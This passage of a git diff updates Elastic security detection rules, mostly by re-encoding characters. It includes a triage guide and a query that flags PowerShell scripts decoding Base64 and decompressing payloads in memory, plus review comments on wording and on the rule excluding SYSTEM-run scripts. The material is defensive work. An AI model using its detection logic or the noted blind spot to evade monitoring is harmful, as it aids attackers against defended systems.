concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and\n not file.path: ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\Downloads\\\\\\\\* and\n not user.id : \"S-1-5-18\"\n", "related_integrations": [ { 
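Review bot: The investigation guide on the added `note` line still tells the analyst to search for 4624 logon events "to the target host after the registry modification", but nothing in this rule involves a registry change — its query matches only on `powershell.file.script_block_text` — so the sentence looks carried over from a registry-based guide; suggest `Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the script execution.` The commit only re-encodes `\u003e` as `>` in this text, so the wording itself was not revisited, and the same sentence presumably lives in the upstream rule source, so that is where it should be fixed. Separately, the unchanged query excludes `user.id : "S-1-5-18"` (Local System) outright, so an encoded-and-compressed payload launched by a service or scheduled task running as SYSTEM will never alert; if that exclusion targets a known benign job it is worth narrowing to that job's parent process, and either way the False positive analysis section should state the blind spot.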
@@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_4.json b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_4.json index bfeb52f3f7e..8b68d805541 100644 --- a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_4.json +++ b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_4.json 
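Review bot: The `setup` text on the `+` line still reads `Steps to implement the logging policy with with Advanced Audit Configuration:`; the doubled word survived the `\u003e` to `>` re-encoding. Suggest `Steps to implement the logging policy with Advanced Audit Configuration:`, which is the wording the 846fe13f rule's setup in this same diff already uses. Since these JSON files appear to be exported from the upstream rule definitions, the correction should be made there so the next release does not reintroduce it.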
@@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_5.json b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_5.json index cb594965fb2..5a05f5d61f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_5.json +++ b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_5.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_6.json b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_6.json index c4157c2c332..2642409fd33 100644 --- a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_6.json +++ b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_6.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_7.json b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_7.json index 34bf3078ba7..56960f8ec45 100644 --- a/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_7.json +++ b/packages/security_detection_engine/kibana/security_rule/81ff45f8-f8c2-4e28-992e-5a0e8d98e0fe_7.json 
@@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_102.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_102.json index 782b48880ba..b18c6d9fbdb 100644 --- a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_102.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_103.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_103.json index fa4818d6a61..71f14a192ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_103.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_104.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_104.json index 8a329b643fb..0fa3bd19753 100644 --- a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_104.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_105.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_105.json index 099288d49b5..8497cdcea78 100644 --- a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_105.json 
@@ -46,7 +46,7 @@ ], "risk_score": 47, "rule_id": "827f8d8f-4117-4ae4-b551-f56d54b9da6b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -73,7 +73,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_106.json b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_106.json index da134ed54db..24f2656ff69 100644 --- a/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/827f8d8f-4117-4ae4-b551-f56d54b9da6b_106.json 
@@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -72,7 +72,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_1.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_1.json index e4182ce1e41..9823a7dc632 100644 --- a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_1.json +++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_1.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_2.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_2.json index 4ea48532f50..59e188c09ba 100644 --- a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_2.json +++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_2.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_3.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_3.json index 96c67e93a1d..14313027ba7 100644 --- a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_3.json 
+++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_3.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_4.json b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_4.json index 0a98e08eba5..86c971db9be 100644 --- a/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_4.json +++ b/packages/security_detection_engine/kibana/security_rule/835c0622-114e-40b5-a346-f843ea5d01f1_4.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_101.json b/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_101.json index 9c794a721a6..b56652bac58 100644 --- a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_101.json +++ b/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_101.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_102.json b/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_102.json index d553a7e068f..ac84a075432 100644 --- a/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_102.json +++ b/packages/security_detection_engine/kibana/security_rule/83a1931d-8136-46fc-b7b9-2db4f639e014_102.json 
@@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_1.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_1.json index 8cf23755e14..ba69219cb63 100644 --- a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_1.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_2.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_2.json index e29af6da136..99b53b24e75 100644 --- a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_2.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_3.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_3.json index 5614cef983f..f7bba27a3e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_3.json +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_3.json 
@@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_4.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_4.json index 26ddec17222..97640d632c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_4.json +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_4.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_5.json b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_5.json index e92def4449c..9ca2aa4ead7 100644 --- a/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_5.json +++ b/packages/security_detection_engine/kibana/security_rule/83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_5.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_1.json b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_1.json index 6fbaab7dd1f..3bfd7c21691 100644 --- a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_1.json +++ b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_1.json 
@@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to implement the logging policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to implement the logging policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_2.json b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_2.json index cc4d1e0a997..01fc2ad1328 100644 --- a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_2.json +++ b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_2.json 
@@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to implement the logging policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to implement the logging policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE 